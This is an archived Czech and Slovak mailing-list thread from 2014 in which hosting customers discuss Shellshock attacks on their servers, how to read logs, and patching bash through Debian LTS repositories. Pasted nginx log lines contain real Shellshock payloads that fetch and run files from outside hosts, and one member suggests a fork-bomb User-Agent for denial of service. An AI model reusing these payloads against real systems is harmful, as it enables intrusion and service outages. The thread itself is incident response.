/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;};
/bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a
possible fraud attempt from "74.201.85.69" claiming to be*
*MailScanner warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - -
[25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; };
ping -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
+0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 200 193 "-" "() {
:;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34
+0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c
\x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - -
[27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200
193 "-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut
len podozrive procesy? a pohladat nejake stopy po tom, ci sa
nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik(a)mimik.sk
<mailto:mimik@mimik.sk>>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz
<mailto:janbivoj.kolar@zazen-nudu.cz>> wrote:
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iF4EAREIAAYFAlQpGVkACgkQ5JdzTS3AJTYOuwEAnjjWwm6jT3Fugx1nQTYcEYAu
GDKe6MNXS+DNM3Cqb9kA/38Dj1l2S3mqgL1Zm9I1hVkAH26yqhapUyZxqShtspgt
=JEDU
-----END PGP SIGNATURE-----
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
byl úspěšný či
nikoliv?
Honza
On 29.9.2014 10 <tel:29.9.2014%2010>:02, Petr Krcmar wrote:
> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
>> Hele,
>>
>> z jineho stroje:
> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
> rootkit:
>
> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:38 a.m.
New subject: {Disarmed} Re: {Disarmed} {Disarmed} Re: Útoky na bash běží
On 09/29/2014 10:33 AM, Jiří Medvěd wrote:
Tak jsem to zkoumal a toto je celkem bezpecne, je to
zda se pouze
test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
ted jo. Ale pred par dny to byl nejaky perlovsky irc bot.
Upgraduj hlavne ten bash :)
Medved
Dne 29.9.2014 v 10:23 René Klačan napsal(a):
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
> http://lists.vpsfree.cz/listinfo/community-list
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {'
/var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
\x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
fraud attempt from "74.201.85.69" claiming to be* *MailScanner
warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
+0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;};
/bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a
possible fraud attempt from "74.201.85.69" claiming to be*
*MailScanner warning: numerical links are often malicious:*
74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
/var/log/nginx/access.log.1:209.126.230.72 - -
[25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; };
ping -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
+0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 200 193 "-" "() {
:;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34
+0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c
\x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - -
[27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200
193 "-" "() { :;}; /bin/bash -c \x22wget
http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym
robit? killnut
len podozrive procesy? a pohladat nejake stopy po tom, ci sa
nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos
<mimik(a)mimik.sk
<mailto:mimik@mimik.sk>>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz
<mailto:janbivoj.kolar@zazen-nudu.cz>> wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
byl úspěšný či
nikoliv?
>
> Honza
>
> On 29.9.2014 10 <tel:29.9.2014%2010>:02, Petr Krcmar wrote:
>> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
>>> Hele,
>>>
>>> z jineho stroje:
>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
>> rootkit:
>>
>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/ _______________________________________________
Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list
mailing list Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list 
8:11 a.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Ahojte,
Predpokladam, ak ma status = 200, tak to asi preslo .....
Ja mam vsade 404 .....
S pozdravom ostava
Michal Kovarčík
CEO, co-owner
phone no.: +421 905 232 652
e-mail: michal.kovarcik(a)mloks.com
linkedin: http://www.linkedin.com/pub/michal-kovarcik/21/840/408
-----Original Message-----
From: community-list-bounces(a)lists.vpsfree.cz
[mailto:community-list-bounces@lists.vpsfree.cz] On Behalf Of "Jan B. Kolář"
Sent: Monday, September 29, 2014 10:08 AM
To: community-list(a)lists.vpsfree.cz
Subject: Re: [vpsFree.cz: community-list] Útoky na bash běží
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
8:12 a.m.
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda
ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
--
Petr Krčmář
vpsFree.cz
8:31 a.m.
On Mon, 29 Sep 2014 10:12:51 +0200
Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
IMHO je logika zejména takováto:
a. Nenašel jsi záznam v logu -> útok byl úspěšný,
b. Našel jsi záznam v logu -> nic nevíš.
To by chtělo monitorovat síťový provoz z nějakého externího, zaručeně
nenapadnutého stroje. S tímhle by zrovna VPSfree mohl pomoci, ne?
Petr T
možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.
8:34 a.m.
Dne 29.9.2014 v 10:31 Petr Tesařík napsal(a):
To by chtělo monitorovat síťový provoz z nějakého
externího, zaručeně
nenapadnutého stroje. S tímhle by zrovna VPSfree mohl pomoci, ne?
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
--
Petr Krčmář
vpsFree.cz
11:35 a.m.
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které
VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
11:42 a.m.
Petr Krcmar wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně
_zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit
binárku (nebo jak jste to testovali), ale druhá věc je, jestli na tom
serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
V tuhle chvíli děláme na tom, abychom zjistili,
které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
11:50 a.m.
Dne 29.9.2014 v 13:42 Jirka Bourek napsal(a):
Ono je jedna věc zkusit někam zachrootovat a zkusit
binárku (nebo jak
jste to testovali), ale druhá věc je, jestli na tom serveru běží nějaké
služby, přes které se ta chyba opravdu dá zneužít.
Zkoušeli jsme samozřejmě tu binárku. Prověřovat každý server zvlášť a
koukat do konfigurace je šílený úkol. Bohatě stačí, když začnou lidi
aktualizovat systém.
--
Petr Krčmář
vpsFree.cz
12:21 p.m.
New subject: [vpsFree.cz: community-list] Ãtoky na bash bÄžÃ
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o to ze je to signal
toho ze admin je ignorant a kasle na bezpecnostni aktualizace. a takovahle chyba bashe lze
zneuzit nejen primo prez cgi, ale napriklad kombinaci s jinou chybou (ruzne formy
injectingu v interpretovanych jazycich, atd...). takze rict ze nejakej server jenom proto
ze nema pustenej apache neni zneuzitelnej proste nejde...
29. září 2014 13:42:37 CEST, Jirka Bourek <trekker.dk(a)abclinuxu.cz> napsal:
Petr Krcmar wrote:
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně
_zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit
binárku (nebo jak jste to testovali), ale druhá věc je, jestli na tom
serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
--
Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte prosím moji
stručnost.
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
> V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
> napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a
zkusíme
> na nich upravenou proměnnou. Upozorníme
uživatele, kteří ještě
nemají
záplatu
(a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
30 Sep
30 Sep
3:23 p.m.
New subject: Ãtoky na bash bÄžÃ
Inak, napadlo mi, ze webka beziaca na plain CGI s neupdatnutym Bashom sa vlastne da velmi
jednoducho "DoS-ovat" z jedineho pocitaca s jedinym requestom. Staci ako
user-agenta poslat fork-bomb :)
:(){ :|:& };:
V pripade vpsFree by toto bol celkom pruser, nakolko by to asi polozilo nielen danu VPS,
ale zrejme celu masinu.
On 29 Sep 2014, at 14:21, Stanislav Petr
<glux(a)glux.org> wrote:
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o to ze je to signal
toho ze admin je ignorant a kasle na bezpecnostni aktualizace. a takovahle chyba bashe lze
zneuzit nejen primo prez cgi, ale napriklad kombinaci s jinou chybou (ruzne formy
injectingu v interpretovanych jazycich, atd...). takze rict ze nejakej server jenom proto
ze nema pustenej apache neni zneuzitelnej proste nejde...
29. září 2014 13:42:37 CEST, Jirka Bourek <trekker.dk
<http://trekker.dk/>@abclinuxu.cz> napsal:
Petr Krcmar wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně
_zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit
binárku (nebo jak js
te to
testovali), ale druhá věc je, jestli na tom
serveru běží nějaké služby, přes které se ta chyba opravdu dá zneužít.
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
<http://lists.vpsfree.cz/listinfo/community-list>
--
Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte prosím moji
stručnost.
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
4:09 p.m.
New subject: [vpsFree.cz: community-list] ÃÂtoky na bash bÃÂþÃÂ
nepolozilo. tohle polozi server jen nekomu kdo nepouziva limitace zdroju... viz man
limits.conf - ze jste cetl tu blbost o fork bombach na zive.cz?
30. září 2014 17:23:27 CEST, "Ján Raška" <raskaj(a)gmail.com> napsal:
Inak, napadlo mi, ze webka beziaca na plain CGI s
neupdatnutym Bashom
sa vlastne da velmi jednoducho "DoS-ovat" z jedineho pocitaca s jedinym
requestom. Staci ako user-agenta poslat fork-bomb :)
:(){ :|:& };:
V pripade vpsFree by toto bol celkom pruser, nakolko by to asi polozilo
nielen danu VPS, ale zrejme celu masinu.
--
Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte prosím moji
stručnost.
On 29 Sep 2014, at 14:21, Stanislav Petr
<glux(a)glux.org> wrote:
je uplne jedno jestli na danem serveru to lze zneuzit nebo ne. jde o
to ze je to
signal toho ze admin je ignorant a kasle na bezpecnostni
aktualizace. a takovahle chyba bashe lze zneuzit nejen primo prez cgi,
ale napriklad kombinaci s jinou chybou (ruzne formy injectingu v
interpretovanych jazycich, atd...). takze rict ze nejakej server jenom
proto ze nema pustenej apache neni zneuzitelnej proste nejde...
29. září 2014 13:42:37 CEST, Jirka Bourek <trekker.dk
<http://trekker.dk/>@abclinuxu.cz> napsal:
Petr Krcmar wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a
zkusíme
na nich upravenou proměnnou. Upozorníme
uživatele, kteří ještě
nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
Zajímalo by mě, kolik z těch "nezáplatovaných" VPS bylo skutečně
_zranitelných_. Ono je jedna věc zkusit někam zachrootovat a zkusit
binárku (nebo jak js
te to
testovali), ale druhá věc je, jestli na tom
serveru běží nějaké služby, přes které se ta chyba opravdu dá
zneužít.
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
<http://lists.vpsfree.cz/listinfo/community-list>
--
Odesláno z mého telefonu s Androidem pomocí pošty K-9 Mail. Omluvte
prosím moji
stručnost.
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
------------------------------------------------------------------------
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list 
29 Sep
29 Sep
11:57 a.m.
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které
záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili,
které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
noon
Dne 29.9.2014 v 13:57 Nikos Timiopulos napsal(a):
debian squeeze ale bez LTS repozitárů,
Je to tak, pro Wheezy je nutné mít zapnutý repozitář security, Squeeze
je podporován už jen v repozitáři squeeze-lts a pokud máte ještě někde
Sarge a Etch (což vřele nedoporučuji), musíte si Přidat speciální repo
na linux.it, kde ta oprava je:
http://ftp.linux.it/pub/People/md/bash/
--
Petr Krčmář
vpsFree.cz
12:16 p.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je
vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz>cz>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS
repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky:
https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
--
Juraj Chlebec aka Havran
http://www.svoji.sk
9:18 p.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem
zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran(a)gmail.com> napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat LTS
repozitare a uz je
vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz>cz>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS
repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky:
https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
--
Juraj Chlebec aka Havran
http://www.svoji.sk
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list
9:20 p.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto
prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale
ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite
pomozete :)
Dik.
Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer(a)gmail.com>
napísal(a):
Byl jsem na tom podobně. Pořád jsem zkoušel
aktualizovat a nic. Pak jsem
zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran(a)gmail.com
<javascript:_e(%7B%7D,'cvml','havran@gmail.com');>> napsal(a):
Tiez dakujem - som dohladal ako do Squeeze pridat
LTS repozitare a uz je
vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz
<javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');>>:
Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS
repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky:
https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz
<javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz');>>
wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
--
Petr Krčmář
vpsFree.cz
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
--
Juraj Chlebec aka Havran
http://www.svoji.sk
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
<javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz');>
http://lists.vpsfree.cz/listinfo/community-list
9:21 p.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Teda.. Aby som doplnil - tusim som poplietol tie edicie... Tak radsej
ciselne - upgrade z 6.0 na 7.0 :)
Dňa pondelok, 29. septembra 2014 Michal Dobsovic <dobsovic(a)itlearning.sk>
napísal(a):
Chystam sa robit dist upgrade z wheezy na squeeze. Ma
s tym niekto
prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale
ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite
pomozete :)
Dik.
Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer(a)gmail.com
<javascript:_e(%7B%7D,'cvml','jirka.cer@gmail.com');>>
napísal(a):
> Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem
> zjistil, že jsem neměl přidaný LTS repozitář. :)
>
>
> Dne 29. září 2014 14:16 Juraj Chlebec <havran(a)gmail.com> napsal(a):
>
>> Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je
>> vsetko ok.
>>
>> Juro Chlebec
>>
>> 2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos(a)manikstudio.cz>cz>:
>>
>>> Ahoj,
>>>
>>> za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS
>>> repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky:
>>> https://wiki.debian.org/LTS/Using
>>>
>>>
>>> Nikos
>>>
>>> On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar(a)vpsfree.cz> wrote:
>>>
>>> Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
>>>
>>> V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě
>>> napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme
>>> na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají
>>> záplatu (a zveřejním nějakou statistiku).
>>>
>>>
>>> Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %).
>>> Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
>>>
>>> --
>>> Petr Krčmář
>>> vpsFree.cz
>>> _______________________________________________
>>> Community-list mailing list
>>> Community-list(a)lists.vpsfree.cz
>>> http://lists.vpsfree.cz/listinfo/community-list
>>>
>>>
>>>
>>> _______________________________________________
>>> Community-list mailing list
>>> Community-list(a)lists.vpsfree.cz
>>> http://lists.vpsfree.cz/listinfo/community-list
>>>
>>>
>>
>>
>> --
>> Juraj Chlebec aka Havran
>> http://www.svoji.sk
>>
>>
>> _______________________________________________
>> Community-list mailing list
>> Community-list(a)lists.vpsfree.cz
>> http://lists.vpsfree.cz/listinfo/community-list
>>
>>
>
9:35 p.m.
Michal Dobsovic wrote:
Chystam sa robit dist upgrade z wheezy na squeeze. Ma
s tym niekto
prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale
ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite
pomozete :)
Tahle narychlo z hlavy mě napadá, že ve squeeze je /etc/mtab symlink na
/proc/mounts. Samo se to při upgrade nezmění, ale když to uděláte ručně,
tak df a spol vypisuje spoustu věcí, které v /proc/mounts jsou ale v
mtab nebyly. Bind mounty a tak.
Výpisy "df" a "mount" jsou pak vcelku nepřehledný a chybí v nich
nějaké
informace.
9:45 p.m.
New subject: [vpsFree.cz: community-list] Útoky na bash běží
Neni to opacne btw?
Jinak jsem mel akorat problem s postfix+maildrop+mysql, kde jsem musel
upravit nejake cesty kvuli chrootu. Jinak zadny problem nebyl.
Jarda
------ Original Message ------
